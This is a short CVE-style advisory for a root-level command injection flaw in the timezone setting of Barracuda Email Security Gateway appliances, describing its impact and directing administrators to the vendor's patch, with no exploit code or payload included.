CVE-2026-111560

HIGH Pub 02/11 Upd 03/11

Overview

This vulnerability is a command injection flaw arising from improper neutralization of shell metacharacters within the timezone configuration parameter in Barracuda Email Security Gateway appliances. The root cause lies in insufficient input sanitization of the timezone field, allowing crafted input to be interpreted as OS commands. The affected component is the timezone configuration processing routine in the Barracuda appliance software, which executes with root privileges.

Vulnerability Description

Improper neutralization of shell metacharacters in the timezone configuration field in certain Barracuda appliance products using common Barracuda code allows an authenticated administrator to inject OS commands that execute with root privileges when the crafted timezone value is subsequently processed.

Impact

An attacker with authenticated administrator access can execute arbitrary operating system commands with root privileges by exploiting this vulnerability. This enables full system compromise, including the ability to manipulate system files, install persistent malware, or pivot to other network resources. The prerequisite is possession of valid administrative credentials; no additional user interaction is required. Such unauthorized command execution can lead to data breaches, service disruption, or complete control over the affected appliance.

Solution

Barracuda Networks has released security updates addressing this command injection vulnerability in the Barracuda Email Security Gateway. Administrators should apply the patches as detailed in the vendor advisory at https://trust.barracuda.com/security/pre-authentication-authorization-bypass-command-injection. The advisory provides specific version numbers and update instructions. No alternative workarounds are recommended; prompt application of the official patch is required to remediate the issue.
